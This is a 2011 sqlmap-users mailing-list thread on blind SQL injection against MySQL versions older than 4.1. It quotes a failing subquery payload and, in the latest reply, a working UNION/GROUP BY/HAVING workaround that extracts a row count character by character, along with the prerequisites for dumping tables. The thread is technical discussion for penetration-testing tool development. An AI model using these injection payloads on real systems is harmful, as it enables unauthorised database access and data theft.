I've found a way around it
this query is invalid:
1234 AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32)) FROM
randomtable),1,1)) > 51
this is valid:
1234 AND 1 = 0 UNION SELECT ORD(MID(IFNULL(CAST(COUNT(*) AS
CHAR),CHAR(32)),1,1)) AS ENTR,id FROM
randomtable
GROUP BY id HAVING ENTR > 51
The same way it would be possible to dump table content.
Necessary for this kind of payload is :
- an injection point which just checks if the query returns a result at all.
- knowledge of the number of selected columns
- knowledge of one column name
Cheers
- Till
> Date: Tue, 12 Jul 2011 23:45:41 +0200
> Subject: Re: [sqlmap-users] Subquery payloads on mysql <4.1
> From: miroslav.stam...@gmail.com
> To: till...@hotmail.com
> CC: sqlmap-users@lists.sourceforge.net
>
> found one (VM) and done some tests :)
>
> you are right, subqueries can't be used on MySQL < 4.1 which means
> that sql injection there is of no significant value (e.g. dumping of
> table content which inherently requires subquerying mechanism).
>
> kr
>
> On Tue, Jul 12, 2011 at 11:23 PM, Miroslav Stampar
> <miroslav.stam...@gmail.com> wrote:
> > ok, got the point.
> >
> > also seen the same thing on Twitter few days ago, maybe it was you :)
> >
> > two things:
> > A) does anyone have experience with subqueries on MySQL < 4.1?
> > B) is there some VM around that carry for example MySQL 3.x ready for
> > testing?
> >
> > kr
> >
> > On Tue, Jul 12, 2011 at 1:01 PM, Till .ch <till...@hotmail.com> wrote:
> >> Hi
> >>
> >>
> >> Lately I've been playing with sqlmap and a 4.0 mysql server. Sqlmap
> >> detected
> >> the injection point just fine, but struggled with gathering information
> >> about other tables.
> >> I guess this happened due to the fact as subqueries have been introduced
> >> with mysql >=4.1 (http://dev.mysql.com/doc/refman/4.1/en/news-4-1-x.html)
> >> and thus payloads like the following are regarded as an invalid query on
> >> mysql <4.1:
> >>
> >>
> >> [PAYLOAD] 1234 AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),CHAR(32))
> >> FROM randomtable),1,1)) > 51
> >>
> >>
> >> Best Regards
> >> Till
> >>
> >> ------------------------------------------------------------------------------
> >> All of the data generated in your IT infrastructure is seriously valuable.
> >> Why? It contains a definitive record of application performance, security
> >> threats, fraudulent activity, and more. Splunk takes this data and makes
> >> sense of it. IT sense. And common sense.
> >> http://p.sf.net/sfu/splunk-d2d-c2
> >> _______________________________________________
> >> sqlmap-users mailing list
> >> sqlmap-users@lists.sourceforge.net
> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >>
> >>
> >
> >
> >
> > --
> > Miroslav Stampar (@stamparm)
> >
> > E-mail: miroslav.stampar (at) gmail.com
> > PGP Key ID: 0xB5397B1B
> >
>
>
>
> --
> Miroslav Stampar (@stamparm)
>
> E-mail: miroslav.stampar (at) gmail.com
> PGP Key ID: 0xB5397B1B
------------------------------------------------------------------------------
AppSumo Presents a FREE Video for the SourceForge Community by Eric
Ries, the creator of the Lean Startup Methodology on "Lean Startup
Secrets Revealed." This video shows you how to validate your ideas,
optimize your ideas and identify your business strategy.
http://p.sf.net/sfu/appsumosfdev2dev
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
